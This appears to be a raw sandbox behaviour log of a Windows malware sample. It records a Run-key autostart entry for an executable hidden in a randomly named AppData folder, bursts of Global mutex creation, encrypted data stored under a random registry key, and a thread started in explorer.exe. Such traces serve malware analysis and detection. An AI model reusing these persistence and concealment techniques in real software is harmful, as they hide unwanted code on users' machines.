Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2024808328
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2025524364
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2026251598
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2026976086
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2027703212
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2028430198
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} Type: String Data: "C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe" success or wait 2029157316
System info queried Type: ProcessInformation success or wait 2042413728
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2042420351
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2042422549
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2042423498
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2042424419
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2042425301
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2042426196
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2042427096
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2042428038
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2042428987
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2042429902
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2042430849
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2042431760
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2042432676
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2042434155
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2042434998
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2042435920
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2042436870
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2042437785
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2042438712
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2042439667
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2042440633
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2042441619
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2042442563
System info queried Type: ProcessInformation success or wait 2061051004
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2061058345
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2061060670
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2061061639
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2061062576
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2061063464
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2061064365
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2061065357
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2061066298
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2061067237
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2061068149
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2061069091
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2061069994
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2061070913
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2061072296
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2061073122
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2061074037
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2061074977
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2061075889
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2061076714
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2061077648
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2061078558
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2061079533
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2061080468
System info queried Type: ProcessInformation success or wait 2078934097
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2078940708
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2078942876
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2078943821
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2078944736
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2078945606
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2078946496
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2078947390
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2078948335
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2078949271
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2078950450
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2078951475
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2078952474
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2078953387
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2078954773
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2078955600
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2078956513
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2078957451
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2078958361
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2078959184
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2078960115
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2078961023
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2078961999
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2078962938
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci buffer overflow 2095600713
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci buffer overflow 2095602284
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Ebci success or wait 2095603330
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2095630106
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2095630625
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2850000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2095655662
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2850000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2095662174
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2095665571
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 2095992509
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci buffer overflow 2095993693
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci buffer overflow 2095995183
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Ebci success or wait 2095995862
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 2096021623
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: Okmaykid success or wait 2096022140
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2096023000
File read Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Offset: none Length: 5 Value: 05 0D 8C 79 C9 end of file 2096024795
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2096030099
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2096032077
Section loaded Path: \KnownDlls\MPRAPI.dll Access: write and read and execute Type: unknown Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2096224624
Section loaded Path: C:\WINDOWS\system32\mprapi.dll Access: query and write and read and execute Type: image Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2096227069
Section loaded Path: \KnownDlls\ACTIVEDS.dll Access: write and read and execute Type: unknown Baseaddress: 76D40000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2096230550
Section loaded Path: C:\WINDOWS\system32\activeds.dll Access: query and write and read and execute Type: image Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid success or wait 2096233025
Section loaded Path: \KnownDlls\adsldpc.dll Access: write and read and execute Type: unknown Baseaddress: 77CC0000 Size: 204800 Protection: read write Mapped to pid: own pid object name not found 2096237960
Section loaded Path: C:\WINDOWS\system32\adsldpc.dll Access: query and write and read and execute Type: image Baseaddress: 76E10000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2096241038
System info queried Type: ProcessInformation success or wait 2096831544
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2850000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2096838181
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2096840348
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2096841200
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2096842101
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2096842964
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2096843843
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2096844722
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2096845644
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2096846649
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2096847561
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2096848495
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2096849676
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2096850587
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} object name exists 2096852073
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2096852902
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2096853812
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2096854749
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} object name exists 2096855655
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2096856480
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2096857411
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2096858316
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2096859290
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2096860223
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 3C 21 64 6F 63 74 79 70 65 20 68 74 6D 6C 3E 3C 68 74 6D 6C 3E 3C 68 65 61 64 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 58 2D 55 41 2D 43 6F 6D 70 61 74 69 62 6C 65 22 20 63 6F 6E 74 65 6E 74 3D 22 49 45 3D 65 64 67 65 22 3E 3C 6D 65 74 61 20 68 74 74 70 2D 65 71 75 69 76 3D 22 63 6F success or wait 2097554074
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 64 64 69 6E 67 3A 31 30 70 78 20 30 3B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 7A 2D 69 6E 64 65 78 3A 32 3B 7A 6F 6F 6D 3A 31 7D 2E 67 62 74 7B 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 64 69 73 70 6C 61 79 3A 2D 6D 6F 7A 2D 69 6E 6C 69 6E 65 2D 62 6F 78 3B 64 69 73 70 6C success or wait 2097887029
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 65 7B 66 6F 6E 74 2D 77 65 69 67 68 74 3A 62 6F 6C 64 7D 23 67 62 6D 70 70 7B 64 69 73 70 6C 61 79 3A 6E 6F 6E 65 7D 23 67 62 64 34 20 2E 67 62 6D 63 63 7B 6D 61 72 67 69 6E 2D 74 6F 70 3A 35 70 78 7D 2E 67 62 70 6D 63 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 65 64 66 65 65 61 7D 2E 67 62 70 6D 63 20 success or wait 2097893021
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 61 74 69 6F 6E 3A 6E 6F 6E 65 7D 23 73 73 2D 62 6F 78 20 61 3A 68 6F 76 65 72 7B 62 61 63 6B 67 72 6F 75 6E 64 3A 23 34 44 39 30 46 45 3B 63 6F 6C 6F 72 3A 23 66 66 66 21 69 6D 70 6F 72 74 61 6E 74 7D 61 2E 73 73 2D 73 65 6C 65 63 74 65 64 7B 63 6F 6C 6F 72 3A 23 32 32 32 21 69 6D 70 6F 72 74 61 6E success or wait 2097939530
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 67 72 6F 75 6E 64 2D 69 6D 61 67 65 3A 2D 6D 73 2D 6C 69 6E 65 61 72 2D 67 72 61 64 69 65 6E 74 28 74 6F 70 2C 23 64 64 34 62 33 39 2C 23 62 30 32 38 31 61 29 3B 66 69 6C 74 65 72 3A 70 72 6F 67 69 64 3A 44 58 49 6D 61 67 65 54 72 61 6E 73 66 6F 72 6D 2E 4D 69 63 72 6F 73 6F 66 74 2E 67 72 61 64 69 success or wait 2097979549
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 63 3D 61 3B 43 3D 63 2B 31 7D 2C 44 3D 5B 5D 2C 43 3D 30 3B 6E 28 22 6C 6F 67 67 65 72 22 2C 7B 69 6C 3A 42 2C 6D 6C 3A 41 7D 29 3B 76 61 72 20 46 3D 77 69 6E 64 6F 77 2E 67 62 61 72 2E 6C 6F 67 67 65 72 3B 76 61 72 20 47 3D 5F 74 76 66 28 22 30 2E 30 31 22 2C 31 2E 30 45 2D 34 29 2C 48 3D 30 3B 0A success or wait 2098020074
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 2C 69 29 3B 57 28 61 2C 22 22 29 7D 7D 2C 4B 61 3D 66 75 6E 63 74 69 6F 6E 28 61 29 7B 74 72 79 7B 55 28 29 3B 76 61 72 20 62 3D 61 7C 7C 64 6F 63 75 6D 65 6E 74 2E 67 65 74 45 6C 65 6D 65 6E 74 42 79 49 64 28 54 29 3B 69 66 28 62 29 7B 57 28 62 2C 22 54 68 69 73 20 73 65 72 76 69 63 65 20 69 73 20 success or wait 2098077499
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 61 70 70 65 6E 64 43 68 69 6C 64 28 62 2E 63 6C 6F 6E 65 4E 6F 64 65 28 74 72 75 65 29 29 7D 63 61 74 63 68 28 65 29 7B 63 28 65 29 7D 7D 3B 61 2E 61 6F 6D 63 3D 66 3B 7D 63 61 74 63 68 28 65 29 7B 77 69 6E 64 6F 77 2E 67 62 61 72 26 26 67 62 61 72 2E 6C 6F 67 67 65 72 26 26 67 62 61 72 2E 6C 6F 67 success or wait 2098086431
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 69 64 3D 67 62 5F 32 35 20 68 72 65 66 3D 22 68 74 74 70 73 3A 2F 2F 64 6F 63 73 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2F 3F 74 61 62 3D 77 6F 22 20 6F 6E 63 6C 69 63 6B 3D 22 67 62 61 72 2E 6C 6F 67 67 65 72 2E 69 6C 28 31 2C 7B 74 3A 32 35 7D 29 22 3E 44 6F 63 75 6D 65 6E 74 73 3C 2F 61 3E 3C 2F 6C 69 success or wait 2098098170
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 3E 20 3C 2F 64 69 76 3E 20 3C 2F 74 64 3E 20 3C 2F 74 72 3E 20 3C 2F 74 61 62 6C 65 3E 20 3C 2F 74 64 3E 20 3C 74 64 3E 20 20 3C 64 69 76 20 63 6C 61 73 73 3D 22 6E 6F 6A 73 76 22 20 73 74 79 6C 65 3D 22 70 6F 73 69 74 69 6F 6E 3A 72 65 6C 61 74 69 76 65 3B 68 65 69 67 68 74 3A 33 30 70 78 22 20 69 success or wait 2098172673
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 6F 67 6C 65 2E 6D 73 67 26 26 67 6F 6F 67 6C 65 2E 6D 73 67 2E 73 65 6E 64 28 36 34 29 7D 66 75 6E 63 74 69 6F 6E 20 76 28 61 29 7B 76 61 72 20 62 3D 66 61 6C 73 65 3B 74 72 79 7B 62 3D 77 69 6E 64 6F 77 2E 65 78 74 65 72 6E 61 6C 2E 69 73 47 6F 6F 67 6C 65 48 6F 6D 65 50 61 67 65 28 29 7D 63 61 74 success or wait 2098186233
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 4096 Value: 34 41 43 77 72 4D 4B 77 42 4F 41 41 73 4B 7A 42 30 4F 41 41 73 4B 7A 41 64 4F 41 41 73 4B 7A 42 63 4F 41 41 73 4B 7A 41 59 4F 41 41 73 4B 7A 41 6D 4F 41 41 73 67 41 4A 66 6B 41 4A 62 2F 4E 65 57 39 6F 41 64 45 79 6A 45 2E 6A 73 27 29 3B 67 6F 6F 67 6C 65 2E 78 6A 73 3D 31 7D 28 66 75 6E 63 74 69 6F success or wait 2098192718
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\webhp[1].txt Offset: none Length: 2852 Value: 39 32 2C 7B 22 61 65 22 3A 74 72 75 65 2C 22 61 76 67 54 74 66 63 22 3A 32 30 30 30 2C 22 62 70 65 22 3A 66 61 6C 73 65 2C 22 62 72 62 61 22 3A 66 61 6C 73 65 2C 22 64 6C 65 6E 22 3A 32 34 2C 22 66 62 64 63 22 3A 35 30 30 2C 22 66 62 64 75 22 3A 33 30 30 30 2C 22 66 62 68 22 3A 74 72 75 65 2C 22 66 success or wait 2098279799
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2098288198
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Okmaykid success or wait 2098288730
System info queried Type: CurrentTimeZoneInformation success or wait 2098290402
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm Offset: none Length: 93 Value: 28 3F DF CC 1A 3B 7B 91 90 86 C1 7C 38 88 CF A9 A5 C2 5C DF D9 49 56 15 DB 68 4C D1 02 EB EB 9C F4 35 B3 26 CF 10 3B F5 5E CD 6F 93 6B 5D 93 1D 8F 1B 26 D0 A2 79 08 73 26 79 27 D3 60 82 77 DA A3 78 7A 52 3A A7 8A A2 6F A2 9A 37 E8 99 47 A9 76 0E 45 BF AD 73 00 0F 7B 90 A5 4D E9 success or wait 2102707700
System info queried Type: ProcessInformation success or wait 2102719354
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: 2890000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2102725970
Thread created PID: 1636 TID: 772 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: false success or wait 2102867804
Mutant created Name: \BaseNamedObjects\Global\{C1D048FE-7063-EEA6-185B-81F8EE8A3A3D} success or wait 2102869635
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5D-F2C0-7FC9-185B-81F8EE8A3A3D} success or wait 2102870069
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Run Name: Isic object name not found 2102870591
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Isic Type: Binary Data: 9F FB 8A 01 CE CB 89 99 78 8F 7A 24 04 EC BF 69 88 AB 89 AB 82 CC B0 25 36 12 91 E9 34 A9 EB 2E 57 1B F6 70 61 B9 F3 01 0E 38 7F 2B 4F B6 85 BD 81 0A 1D 97 0A 25 5D 94 98 63 9C 40 81 BC D2 5D 0F AC 89 8E EC 10 21 E4 E9 91 3B 00 C6 6B 24 D2 success or wait 2102882638
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 2102886080
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci buffer overflow 2102887554
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Ebci success or wait 2102888079
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid success or wait 2102914337
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid success or wait 2102914881
File write Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JQ2FZ3JS\red[1].htm Offset: none Length: 64 Value: 8C 75 87 84 27 E6 70 83 E6 84 3E 81 1E 7B E6 BD D9 9D EF 62 79 E9 F6 B5 7B C8 EC 71 A2 4B 4B 3C 4B 2F FD DD 66 CC 33 A9 FA 26 DE B4 F1 BE 2F 26 B5 21 1C EA 98 43 32 49 01 5E 00 F4 5A B8 4D E0 success or wait 2105448184
Thread delayed Time: 0 TID: 1906 success or wait 2105657569
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography Name: {BD75E342-DBDF-9203-185B-81F8EE8A3A3D} object name not found 2107458216
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107460061
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107461901
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv Access: write attributes and synchronize Options: synchronous io non alert and open for backup ident and open reparse point success or wait 2107465608
